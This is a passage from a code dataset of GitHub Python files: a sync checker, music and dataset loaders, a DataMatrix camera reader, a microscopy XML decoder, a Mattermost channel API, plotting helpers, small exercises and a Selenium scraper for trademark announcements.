\"\":\n remote2 = {}\n for p in remote_ls:\n remote2[p.replace(subfolder, \"\", 1)] = remote_ls[p]\n remote_ls = remote2\n local_ls = dirsnap(path)\n def dodiff(remotefiles, localfiles):\n \"\"\" from {'path/to/file': file, ...}, set('path/to/file', ...) 
do a\n check that the same files are present returns dict of dict of files\n {missing_local, missing_remote}\n \"\"\"\n missing = {}\n logging.info(str(len(missing)) + \" \" + str(len(localfiles)))\n removed = 0\n for k in remotefiles.keys():\n try:\n if platform.system() == 'Darwin':\n localfiles.remove(unicodedata.normalize('NFD', k))\n removed += 1\n else:\n localfiles.remove(os.path.normpath(k))\n except KeyError as e:\n missing[k] = time.time()\n logging.info(str(len(missing)) + \" \" + str(len(localfiles)))\n logging.info(\"Removed \" + str(removed))\n return {\"missing_local\": missing, \"missing_remote\": localfiles}\n #print(remote_ls)\n diff = dodiff(remote_ls, self.toset(path, local_ls.paths))\n return diff\n\n def parseWithExcludes(self, diff, excludes):\n \"\"\" Parses a diff, returns only items not matching excludes\n :param diff: will be MUTATED\n :param excludes: the list of patterns to delete\n TODO This code could probably be heavily optimized if the need appeared\n \"\"\"\n ndiff = {\"missing_remote\": dict(), \"missing_local\": dict()}\n excludes.append('')\n for p in diff[\"missing_local\"].keys():\n skip = False\n for patt in excludes:\n if fnmatch.fnmatch(p, patt):\n skip = True\n break\n if not skip:\n ndiff[\"missing_local\"][p] = diff[\"missing_local\"][p]\n for p in diff[\"missing_remote\"]:\n skip = False\n for patt in excludes:\n if fnmatch.fnmatch(p, patt):\n skip = True\n break\n if not skip:\n ndiff[\"missing_remote\"][p] = \"\"\n return ndiff\n\n def dofullcheck(self):\n \"\"\"\n Ask the remote sdk for a recursive list of files, compares with the local tree\n :return: dictionary containing path to missing files (missing_remote, missing_local)\n \"\"\"\n excludes = self.conf[self.jobid].filters['excludes']\n diff = self.docheck(self.conf[self.jobid].directory, self.conf[self.jobid].remote_folder)\n cleaned = self.parseWithExcludes(diff, excludes)\n return cleaned\n# end of SyncChecker\n\nclass SyncHardener():\n \"\"\"\n Check the status of non-IDLE files\n \"\"\"\n def resyncfolder(self):\n pass\n# end of SyncHardener","repo_name":"sha1/pydio-sync","sub_path":"src/pydio/utils/check_sync.py","file_name":"check_sync.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"44535348761","text":"import pandas as pd\nfrom pathlib import Path\nimport numpy as np\nimport randomname\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import select\n\nfrom db_connector.src.models import MusicInfo\n\n\ndef get_music_connector(type, **config):\n if type == \"LocalDisk\":\n return DiskMusicConnector(**config)\n if type == \"DB\":\n return DBMusicConnector(**config)\n return None\n\n\nclass DBMusicConnector:\n def __init__(self, cri, music_location, echo=False):\n self.engine = create_engine(cri, echo=echo)\n self.session = Session(self.engine)\n\n self.music_location = Path(music_location)\n self.names_domains = {\"adj\": (\"music_theory\",), \"noun\": (\"cats\", \"food\")}\n\n def get_music_info(self, music_ids: list[int]):\n \"\"\"\n returns related information to music like Author etc.\n \"\"\"\n results = (\n self.session.query(MusicInfo.path).filter(MusicInfo.id.in_(music_ids)).all()\n )\n rel_paths = [row[0] for row in results]\n print(rel_paths)\n\n authors = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n music_names = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n 
genres = [rel_path.split(\"/\")[0] for rel_path in rel_paths]\n\n return [\n {\n \"path\": rel_path,\n \"author\": author,\n \"music_name\": music_name,\n \"genre\": genre,\n \"id\": m_id,\n }\n for rel_path, author, music_name, genre, m_id in zip(\n rel_paths, authors, music_names, genres, music_ids\n )\n ]\n\n def __del__(self):\n self.session.close()\n\n\nclass DiskMusicConnector:\n def __init__(self, music_info_path, music_location):\n self.music_info = pd.read_csv(music_info_path, index_col=\"song_id\")\n self.music_location = Path(music_location)\n self.names_domains = {\"adj\": (\"music_theory\",), \"noun\": (\"cats\", \"food\")}\n\n def get_music_info(self, music_ids: list[int]):\n \"\"\"\n returns related information to music like Author etc.\n \"\"\"\n rel_paths = self.music_info.loc[np.array(music_ids)].paths.to_list()\n authors = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n music_names = [\n randomname.get_name(**self.names_domains) for i in range(len(rel_paths))\n ]\n genres = [rel_path.split(\"/\")[0] for rel_path in rel_paths]\n\n return [\n {\n \"path\": rel_path,\n \"author\": author,\n \"music_name\": music_name,\n \"genre\": genre,\n \"id\": m_id,\n }\n for rel_path, author, music_name, genre, m_id in zip(\n rel_paths, authors, music_names, genres, music_ids\n )\n ]\n","repo_name":"linearbaby/VKR","sub_path":"Web/utils/music_connector.py","file_name":"music_connector.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71148372410","text":"# _*_ coding: utf-8 _*_\n\"\"\"\nTime: 2020/11/30 17:02\nAuthor: Ding Cheng(Deeachain)\nFile: dataset_builder.py\nDescribe: Write during my study in Nanjing University of Information and Secience Technology\nGithub: https://github.com/Deeachain\n\"\"\"\nimport os\nimport pickle\nimport pandas as pd\nfrom dataset.liveness import LivenessTrainDataSet, LivenessValDataSet, LivenessTestDataSet, LivenessTestVideo\nimport glob\n\ndef build_dataset_train(root, base_size, crop_size, test_mode=False):\n data_dir = root#os.path.join(root, dataset)\n train_data_list = os.path.join(root, 'datasets/train_list.txt')\n \n \n TrainDataSet = LivenessTrainDataSet(data_dir, train_data_list, base_size=base_size, crop_size=crop_size,\n ignore_label=0, test_mode= test_mode) \n return TrainDataSet\n\n\ndef build_dataset_test(root, crop_size, gt=False, test_mode=False):\n data_dir = root \n train_data_list = os.path.join(root, 'datasets/train_list.txt')\n \n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n \n \n \n \n if gt:\n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n testdataset = LivenessValDataSet(data_dir, test_data_list, crop_size=crop_size, ignore_label=0, test_mode= test_mode)\n else:\n test_data_list = os.path.join(root, 'datasets/test_list.txt')\n testdataset = LivenessTestDataSet(data_dir, test_data_list, crop_size=crop_size, ignore_label=0)\n \n return testdataset\n\ndef build_dataset_mp4(root, crop_size, frame_num=5):\n\n if root =='':\n root ='.'\n mp4_list = root +'/*/*/*.mp4'\n files = glob.glob(mp4_list)\n\n mp4data= LivenessTestVideo(root= '', crop_size= crop_size, file_txt = files, frame_num= frame_num)\n return 
mp4data\n","repo_name":"trankha1655/Zalo_liveness_detection","sub_path":"builders/dataset_builder.py","file_name":"dataset_builder.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"7946011804","text":"import cv2\nfrom pylibdmtx import pylibdmtx\nimport threading\nimport numpy as np\nimport time\nfrom ModbusModule import *\n\n#import zxingcpp\n#import numpy\n\n# from dbr import BarcodeReader, EnumErrorCode\n\nreaded = True\n\nmodbus = ModbusModule()\n\ndef decode_frame(frame):\n    global readed\n    readed = False\n    print(\"decoding\")\n    data = pylibdmtx.decode(frame)\n    print(data)\n    readed = True\n\n\n# vid = cv2.VideoCapture('/dev/v4l/by-id/usb-Arducam_Technology_Co.__Ltd._Arducam_16MP_SN0001-video-index0')\n# vid.set(cv2.CAP_PROP_EXPOSURE, 500)\n# vid.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('M','J','P','G'))\n# vid.set(cv2.CAP_PROP_FRAME_WIDTH,1600)\n# vid.set(cv2.CAP_PROP_FRAME_HEIGHT,1200)\n\nvid = cv2.VideoCapture('/dev/v4l/by-id/usb-Arducam_Technology_Co.__Ltd._Arducam_OV2311_USB_Camera_UC621-video-index0')\nvid.set(cv2.CAP_PROP_EXPOSURE, 500)\nvid.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('Y','U','Y','V'))\nvid.set(cv2.CAP_PROP_FRAME_WIDTH,1600)\nvid.set(cv2.CAP_PROP_FRAME_HEIGHT,1200)\n\n\n\nmodbus.connect_modbus()\ntime.sleep(5)\nmodbus.open_blue_led()\n\nwhile(True):\n    try:\n        # Capture the video frame\n        # by frame\n        # print(\"capturing frame.\")\n        ret, frame = vid.read()\n\n\n        # Display the resulting frame\n        if ret:\n            matrix = cv2.getPerspectiveTransform(np.float32([[563,208],[562,1099],[1389,215],[1380,1092]]),np.float32([[0,0],[0,700],[700,0],[700,700]]))\n            frame = cv2.warpPerspective(frame,matrix,(700,700))\n\n            cv2.imshow('frame', frame)\n\n            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n            # ret,thresh = cv2.threshold(frame, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n            _,thresh = cv2.threshold(frame, int(np.max(frame)*0.8), 255, cv2.THRESH_BINARY)\n            \n            if readed == True:\n                threading.Thread(target=decode_frame,args=(thresh,),daemon=True).start()\n            \n            #1\n            #np_arr = numpy.array(frame)\n            #results = zxingcpp.read_barcodes(np_arr)\n            #print(results)\n\n            #2 Very fast but paid\n            # reader = BarcodeReader()\n            # results = reader.decode_buffer(frame)\n            # if results != None:\n            #     for text_result in results:\n            #         print(\"Barcode Format : \")\n            #         print(text_result.barcode_format_string)\n            #         print(\"Barcode Text : \")\n            #         print(text_result.barcode_text)\n            #         print(\"Localization Points : \")\n            #         print(text_result.localization_result.localization_points)\n            #         print(\"Exception : \")\n            #         print(text_result.exception)\n            #         print(\"-------------\")\n            #     print(results)\n            \n        else:\n            print(\"no frame\")\n        \n        # the 'q' button is set as the\n        # quitting button you may use any\n        # desired button of your choice\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            modbus.close_all_coils()\n            break\n\n    except Exception as e:\n        print(\"except\",e)\n        break\n\n# After the loop release the cap object\nvid.release()\n# Destroy all the windows\ncv2.destroyAllWindows()\n","repo_name":"codderdreamer/DataMatrixReader","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"26144709149","text":"dics = {\n\n    \"virat\" : \"big\", \n    \"satyam\" : \"true\",\n    \"bhagwan\" : \"God\",\n    \"sona\" : \"sleep\",\n    \"kapda\" : \"cloth\",\n}\n\nprint(\"Options are : \", dics.keys())\n\na = 
input(\"Enter Your Word : \")\n\nprint(\"The meaning of your word is : \", dics[a])\n","repo_name":"satyampatel13/Python_CT55","sub_path":"python 27 programs/q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"415171188","text":"# Using Python to solve the questions.\n# Question 4\n\n\ndef determinFinger(num):\n r = num % 8\n if r == 1:\n return \"Thumb\"\n if r == 5:\n return \"Little Finger\"\n if r == 0 or r == 2:\n return \"Index Finger\"\n if r == 3 or r == 7:\n return \"Middle Finger\"\n if r == 4 or r == 6:\n return \"Ring Finger\"\n\n\nprint(determinFinger(13))\n","repo_name":"ntexplorer/PythonPractice","sub_path":"CashCalc_Recruiment/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31343405957","text":"\"\"\"XML decoder for CODEX\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport numpy as np\nimport math\n\n\nclass XMLDecoder:\n\n def __init__(self):\n self.decoded_content = dict()\n\n def _number_of_cycles(self, root):\n number = 0\n exposures = root.find('Exposures')\n for item in exposures.findall('ExposureItem'):\n active = item.find('Active').text\n if active == 'true':\n number += 1\n return number\n\n def _number_of_channels(self, root):\n channels = root.find('Channels')\n number = len(channels.findall('string'))\n return number\n\n # https://github.com/KnottLab/codex/blob/2ff63079a3964dea6e242a20defec5851630042e/functions/data_utils/create_CODEX_object.m#L215\n def _number_of_xy_tiles(self, root):\n attachment = root.find('Element').find('Data').find('Image').find('Attachment')\n px = []\n py = []\n\n for tile in attachment.findall('Tile'):\n # flip X and Y here too??\n px.append(tile.get('PosY'))\n py.append(tile.get('PosX'))\n\n positions = [(i,j) for i,j in zip(px,py)]\n Upx = np.unique(px)\n Upy = np.unique(py)\n\n x = len(Upx)\n y = len(Upy)\n\n real_tiles = np.zeros((x,y), dtype=object)\n real_tiles[:] = 'x'\n print(f'Building real tiles array: {real_tiles.shape}')\n # snakes like this:\n # 01 02 03 04\n # 08 07 06 05\n # 09 10 11 12\n tile_num = 0 # start tile numbering at 0\n for i in range(x):\n Ry = np.arange(y) if i%2==0 else np.arange(y)[::-1]\n for j in Ry:\n if (Upx[i], Upy[j]) in positions:\n real_tiles[i,j] = f'{tile_num:02d}'\n tile_num += 1\n Ntiles = len(positions)\n return x, y, real_tiles, Ntiles\n\n def _number_of_z_stacks(self, root):\n z_stacks = int(root.find('ZstackDepth').text)\n return z_stacks\n\n def _get_tile_width(self, root):\n dimension = root.find('Element').find('Data').find('Image').find('ImageDescription').find('Dimensions')\n width = int(dimension.find('DimensionDescription').get(\"NumberOfElements\"))\n height = int(dimension.find('DimensionDescription').get('NumberOfElements'))\n overlap_x = 0\n overlap_y = 0\n\n attachments = root.find('Element').find('Data').find('Image').findall('Attachment')\n for a in attachments:\n if a.get(\"Name\") == \"HardwareSetting\":\n atl = a.find(\"ATLCameraSettingDefinition\")\n xy = atl.find('XYStageConfiguratorSettings')\n stitch = xy.find('StitchingSettings')\n overlap_x = float(stitch.get('OverlapPercentageX'))\n overlap_y = float(stitch.get('OverlapPercentageY'))\n\n overlap_width = width - math.floor((1 - overlap_x) * width)\n overlap_height = height - math.floor((1 - overlap_y) * height)\n\n return width, height, overlap_x, overlap_y, 
overlap_width, overlap_height\n\n def _get_resolutionh(self, root):\n dimension = root.find('Element').find('Data').find('Image').find('ImageDescription').find('Dimensions')\n width = int(dimension.find('DimensionDescription').get(\"NumberOfElements\"))\n length = float(dimension.find('DimensionDescription').get('Length'))\n\n return (10 ** 6) * length / width\n\n def _get_marker_names(self, root, num_cycles, num_channels):\n exposure_items = root.find('Exposures').findall('ExposureItem')\n marker_list = []\n marker_names = []\n for item in exposure_items[:num_cycles]:\n antibody = item.find('AntiBody').findall('string')\n for a in antibody:\n marker_names.append(a.text.replace('/', '-').replace(' ', '-'))\n\n for i, marker in enumerate(marker_names):\n marker_list.append(marker + '_' + str(i))\n\n marker_names_array = np.array(marker_names)\n marker_names_array = marker_names_array.reshape(num_cycles, num_channels)\n marker_list = np.array(marker_list)\n marker_array = marker_list.reshape(num_cycles, num_channels)\n return marker_names, marker_list, marker_array, marker_names_array\n\n def _get_exposure_times(self, root):\n exposure_item = root.find('Exposures').find('ExposureItem')\n exposure_time = exposure_item.find('ExposuresTime')\n decimal_values = []\n for decimal in exposure_time.findall('decimal'):\n decimal_values.append(int(decimal.text))\n return decimal_values\n\n def _get_wavelengths(self, root):\n exposure_item = root.find('Exposures').find('ExposureItem')\n wavelength = exposure_item.find('WaveLength')\n wavelength_values = []\n for values in wavelength.findall('decimal'):\n wavelength_values.append(int(values.text))\n return wavelength_values\n\n def _get_channels(self, root):\n channels = root.find(\"Channels\")\n channel_names = []\n for name in channels.findall('string'):\n channel_names.append(name.text)\n return channel_names\n\n def decode(self, file_content_xml, file_content_xlif, cycle_folders):\n root_xml = ET.fromstring(file_content_xml)\n root_xlif = ET.fromstring(file_content_xlif)\n self.decoded_content['roi'] = 1\n self.decoded_content['ncl'] = self._number_of_cycles(root_xml)\n self.decoded_content['cycle_folders'] = cycle_folders\n self.decoded_content['nch'] = self._number_of_channels(root_xml)\n self.decoded_content['nz'] = self._number_of_z_stacks(root_xml)\n tile_info = self._number_of_xy_tiles(root_xlif)\n self.decoded_content['nx'] = tile_info[0]\n self.decoded_content['ny'] = tile_info[1]\n self.decoded_content['real_tiles'] = tile_info[2]\n self.decoded_content['Ntiles'] = tile_info[3]\n # self.decoded_content['RNx'] = # for dealing with non-rectangular ROIs\n # self.decoded_content['RNy'] = # for dealing with non-rectangular ROIs\n # self.decoded_content['real_tiles'] = # for dealing with non-rectangular ROIs\n self.decoded_content['tileWidth'], self.decoded_content['tileHeight'], self.decoded_content['ox'], \\\n self.decoded_content['oy'], self.decoded_content['width'], self.decoded_content[\n 'height'] = self._get_tile_width(root_xlif)\n self.decoded_content['exposure_times'] = self._get_exposure_times(root_xml)\n self.decoded_content['channels'] = self._get_channels(root_xml)\n self.decoded_content['wavelengths'] = self._get_wavelengths(root_xml)\n self.decoded_content['resolution'] = self._get_resolutionh(root_xlif)\n self.decoded_content['marker_names'], self.decoded_content['markers'], \\\n self.decoded_content['marker_array'], self.decoded_content['marker_names_array'] = self._get_marker_names(\n root_xml, self.decoded_content['ncl'],\n 
self.decoded_content['nch'])\n\n return self.decoded_content\n","repo_name":"KnottLab/codex","sub_path":"preprocessing/xml_decoder.py","file_name":"xml_decoder.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39203502449","text":"#!/usr/bin/env python3\nimport html\nimport sqlite3\n\nimport bottle\n\nimport utils\n\n@bottle.get('/')\ndef index():\n\treturn f'
<html><head><title>mattermost.fsinf.at glue API</title></head>'\\\n\t\t\t'<body><h1>Redirect to channel by course code</h1><p>/channel_by_course_code/&lt;code&gt;</p></body></html>
'\n\ndef _infrelated(catalog):\n\treturn catalog['subject_de'] in ('Informatik', 'Wirtschaftsinformatik')\\\n\t\tor catalog['name_de'] == 'Transferable Skills'\\\n\t\tor catalog['name_de'] == 'Katalog Für alle Hörerinnen/Hörer'\n\n@bottle.route('/channel_by_course_code/', method=('GET', 'POST'))\ndef channel_by_course_code(code):\n\tconn = sqlite3.connect(utils.DBFILE)\n\tcur = conn.cursor()\n\tcur.execute('SELECT name FROM code_to_name WHERE code = ?', (code,))\n\trow = cur.fetchone()\n\n\tif row is not None:\n\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + row[0])\n\n\tres = utils.toss_api('/courses/' + code)\n\tif res.status_code != 200:\n\t\treturn bottle.HTTPError(404, 'TOSS could not find this course')\n\n\tcourse = res.json()\n\tchname = utils.channel_name(course['name_de'])\n\n\tres = utils.mm_api(f'/teams/{utils.VOWI_TEAMID}/channels/name/{chname}')\n\n\tif res.status_code == 200:\n\t\tcur.execute('INSERT INTO code_to_name (code, name) VALUES (?, ?)', (code, chname))\n\t\tconn.commit()\n\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + chname)\n\n\tif not any([_infrelated(x) for x in course['mapping']]):\n\t\treturn bottle.HTTPError(403, 'mattermost.fsinf.at is only for informatics related courses'\\\n\t\t\t\t' and this course does not seem to be associated with'\\\n\t\t\t\t' Informatics, Business Informatics or the Transferable Skills.')\n\n\tif bottle.request.method == 'GET':\n\t\treturn f'
<html><body><p>There currently is no channel for {html.escape(course[\"name_en\"])},'\\\n\t\t\t\t' but you can create one:</p>'\\\n\t\t\tf'<form method=\"post\" action=\"/channel_by_course_code/{code}\"><input type=\"submit\" value=\"Create channel\"></form></body></html>
'\n\n\telif bottle.request.method == 'POST':\n\t\tres = utils.mm_api('/channels', method='post', json={\n\t\t\t'team_id': utils.VOWI_TEAMID,\n\t\t\t'name': chname,\n\t\t\t'display_name': course['name_de'][:64],\n\t\t\t'header': utils.channel_header(course),\n\t\t\t'type': 'O'\n\t\t})\n\t\tif res.status_code == 201:\n\t\t\tcur.execute('INSERT INTO code_to_name (code, name) VALUES (?, ?)', (code, chname))\n\t\t\tconn.commit()\n\t\t\treturn bottle.redirect(utils.CHANNEL_PREFIX + chname)\n\t\telse:\n\t\t\tprint(res.json())\n\t\t\treturn bottle.HTTPError(500, 'Channel creation failed')\n\nif __name__ == '__main__':\n\tbottle.run(port=8180)\n","repo_name":"fsinf/mm-glue","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25639053716","text":"number = float(input())\nbase, precision, min_value, max_value = input().split()\nbase = int(base)\nprecision = int(precision)\nmin_value = int(min_value)\nmax_value = int(max_value)\n\ndef representationDecimalNumbers(number: float, base: int, precision: int, min_value: int, max_value: int):\n value = number\n binary = \"\"\n partInt = 0\n contZero = 0\n partFrac = 0.0\n top_value = False\n \n while len(binary) < precision:\n _value = value * base\n partInt = int(_value)\n partFrac = _value - partInt\n \n if partInt == 1:\n top_value = True \n if top_value:\n binary += str(partInt)\n else:\n contZero += 1\n \n value = partFrac\n\n print(\"0.{} {}\".format(binary.ljust(precision, '0'), -contZero))\n\nrepresentationDecimalNumbers(number, base, precision, min_value, max_value)","repo_name":"Outro-Lucas/matematica-computacional","sub_path":"1. ERROS/2. Representação de números decimais.py","file_name":"2. 
Representação de números decimais.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4971673420","text":"from __future__ import annotations\n\nimport math\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import PolyCollection\n\nimport numpy as np\nfrom numpy.typing import ArrayLike\n\nimport numpy\n\n\ndef nnls(A, b, eps: float = 1.0e-10, max_steps: int = 100):\n # non-negative least-squares after\n # \n A = numpy.asarray(A)\n b = numpy.asarray(b)\n\n AtA = A.T @ A\n Atb = A.T @ b\n\n m, n = A.shape\n assert m == b.shape[0]\n mask = numpy.zeros(n, dtype=bool)\n x = numpy.zeros(n)\n w = Atb\n s = numpy.zeros(n)\n k = 0\n while sum(mask) != n and max(w) > eps:\n if k >= max_steps:\n break\n mask[numpy.argmax(w)] = True\n\n s[mask] = numpy.linalg.lstsq(AtA[mask][:, mask], Atb[mask], rcond=None)[0]\n s[~mask] = 0.0\n\n while numpy.min(s[mask]) <= 0:\n alpha = numpy.min(x[mask] / (x[mask] - s[mask]))\n x += alpha * (s - x)\n mask[numpy.abs(x) < eps] = False\n\n s[mask] = numpy.linalg.lstsq(AtA[mask][:, mask], Atb[mask], rcond=None)[0]\n s[~mask] = 0.0\n\n x = s.copy()\n w = Atb - AtA @ x\n\n k += 1\n\n return x\n\n\ndef move_min_distance(targets: ArrayLike, min_distance: float) -> np.ndarray:\n \"\"\"Move the targets such that they are close to their original positions, but keep\n min_distance apart.\n\n https://math.stackexchange.com/a/3705240/36678\n \"\"\"\n # sort targets\n idx = np.argsort(targets)\n targets = np.sort(targets)\n\n n = len(targets)\n x0_min = targets[0] - n * min_distance\n A = np.tril(np.ones([n, n]))\n b = targets - (x0_min + np.arange(n) * min_distance)\n\n # import scipy.optimize\n # out, _ = scipy.optimize.nnls(A, b)\n\n out = nnls(A, b)\n\n sol = np.cumsum(out) + x0_min + np.arange(n) * min_distance\n\n # reorder\n idx2 = np.argsort(idx)\n return sol[idx2]\n\n\ndef get_mid_y(c: PolyCollection):\n points = c.get_paths()[0].vertices\n # x = points[1:, 0].reshape(2, int(points[:, 1].size / 2))\n # x_high = x[0]\n # x_low = x[1]\n\n y = points[1:, 1].reshape(2, int(points[:, 1].size / 2))\n y_high = y[0]\n y_low = y[1]\n\n return (y_high[-2] + y_low[0]) / 2\n\n\ndef label_fillbetween(\n min_label_distance: float or str = \"auto\",\n alpha_optimize: float = 1.0,\n **text_kwargs,\n):\n ax = plt.gca()\n\n logy = ax.get_yscale() == \"log\"\n\n if min_label_distance == \"auto\":\n # Make sure that the distance is alpha * fontsize. This needs to be translated\n # into axes units.\n fig = plt.gcf()\n fig_height_inches = fig.get_size_inches()[1]\n ax = plt.gca()\n ax_pos = ax.get_position()\n ax_height = ax_pos.y1 - ax_pos.y0\n ax_height_inches = ax_height * fig_height_inches\n ylim = ax.get_ylim()\n if logy:\n ax_height_ylim = math.log10(ylim[1]) - math.log10(ylim[0])\n else:\n ax_height_ylim = ylim[1] - ylim[0]\n # 1 pt = 1/72 in\n fontsize = mpl.rcParams[\"font.size\"]\n assert fontsize is not None\n min_label_distance_inches = fontsize / 72 * alpha_optimize\n min_label_distance = (\n min_label_distance_inches / ax_height_inches * ax_height_ylim\n )\n\n # Add \"legend\" entries.\n # Get last non-nan y-value.\n targets = []\n for c in plt.gca().collections:\n if not isinstance(c, PolyCollection):\n continue\n\n targets.append(get_mid_y(c))\n\n if logy:\n targets = [math.log10(t) for t in targets]\n\n # Sometimes, the max value if beyond ymax. 
It'd be cool if in this case we could put\n # the label above the graph (instead of the to the right), but for now let's just\n # cap the target y.\n ymax = ax.get_ylim()[1]\n targets = [min(target, ymax) for target in targets]\n\n targets = move_min_distance(targets, min_label_distance)\n if logy:\n targets = [10**t for t in targets]\n\n labels = [\n c.get_label() for c in plt.gca().collections if isinstance(c, PolyCollection)\n ]\n alphas = [\n c.get_alpha() for c in plt.gca().collections if isinstance(c, PolyCollection)\n ]\n colors = [\n c.get_facecolor()\n for c in plt.gca().collections\n if isinstance(c, PolyCollection)\n ]\n\n axis_to_data = ax.transAxes + ax.transData.inverted()\n xpos = axis_to_data.transform([1.03, 1.0])[0]\n\n for label, ypos, color, alpha in zip(labels, targets, colors, alphas):\n plt.text(\n xpos,\n ypos,\n label,\n verticalalignment=\"center\",\n alpha=alpha,\n color=color[0],\n **text_kwargs,\n )\n","repo_name":"RemDelaporteMathurin/3d_monoblocks","sub_path":"baking/matplotx_proxy.py","file_name":"matplotx_proxy.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30638703847","text":"# 백준 단계별 풀이 9단계 - 소수 구하기\n# https://www.acmicpc.net/problem/1929\n\n# def check_yaksoo(n):\n# if n == 1:\n# return False\n# else:\n# for i in range(2, int(n ** 0.5) + 1):\n# if n % i == 0:\n# return False\n# return True\n\n# m, n = map(int, input().split())\n# for i in range(m, n + 1):\n# if check_yaksoo(i):\n# print(i)\n\n# 에라토스테네스의 체를 이용한 방식\n\n#n 이하의 체를 구하는 함수\ndef prime(n):\n #0과1은 소수가아니므로 False, 나머지 2부터 n까지는 n-1개임\n\tseive = [False, False] + [ True ] * (n-1)\n\tk = int(n ** 0.5)\n\n\t#2~ 루트n + 1까지\n\tfor i in range(2, k+1):\n\t\tif seive[i]:\n\t\t\tfor j in range(i+i, n+1, i):\n\t\t\t\tseive[j] = False\n\treturn [ i for i in range(2, n+1) if seive[i] == True]\n\nm, n = map(int, input().split())\nprime_list = prime(n)\nfor i in prime_list:\n\tif i < m:\n\t\tcontinue\n\tprint(i)\n","repo_name":"devraphy/algorithm","sub_path":"baekjoon/step9_math2/1929_star.py","file_name":"1929_star.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29399727629","text":"def palindromo(palabra):\n palabra=list(palabra)\n a=palabra[0]\n b=palabra[len(palabra)-1]\n if len(palabra)==1:\n return True\n if a==b:\n palabra.remove(a)\n palabra.remove(b)\n return palindromo(palabra)\n if a!=b:\n return False\n return\n\nif __name__==\"__main__\":\n print(palindromo(\"oso\"))\n print(palindromo(\"dinosaurio\"))\n \n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema11_ej1/tema11_ej1_ded15abd5c16cd505e828817e4ded25e.py","file_name":"tema11_ej1_ded15abd5c16cd505e828817e4ded25e.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4968456295","text":"'''\n\n案例:中国商标网公告爬虫(selenium)\nhttp://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/homePage.html\nhttp://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/annSearch.html?annNum=1654\n爬取期号为1654的公告信息:序号,期号,公告日期,注册号,申请人,商标名称\n\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport random\nimport re\n\nbrowser = 
webdriver.Chrome()\nbrowser.maximize_window()\n# 定义等待条件\nwait = WebDriverWait(browser, 60)\ntry:\n browser.get('http://wsgg.sbj.cnipa.gov.cn:9080/tmann/annInfoView/homePage.html')\n # 输入框\n tb_input = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#annNum'))\n )\n # 按钮\n search_btn = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#annNumSubmit'))\n )\n tb_input.clear()\n tb_input.send_keys('1654')\n time.sleep(3)\n\n search_btn.click()\n # 等待搜索结果中的条目加载完成\n wait.until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.jsTj.w1008'))\n EC.presence_of_element_located((By.CSS_SELECTOR, '.searchAnnnum'))\n )\n # 等待加载页数元素\n total = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '#pages'))\n )\n total = total.text.strip()\n pat = re.compile(r'(\\d+)')\n match_obj = pat.search(total)\n if match_obj:\n total = int(match_obj.group(1))\n else:\n total = 1\n print(f'total:{total}')\n page = 1\n while True:\n print(f\"正在加载第{page}页\")\n # 等待搜索结果中的条目加载完成\n wait.until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.jsTj.w1008'))\n EC.presence_of_element_located((By.CSS_SELECTOR, '.searchAnnnum'))\n )\n ls = browser.find_elements_by_xpath('//tr[@class=\"evenBj\"]')\n 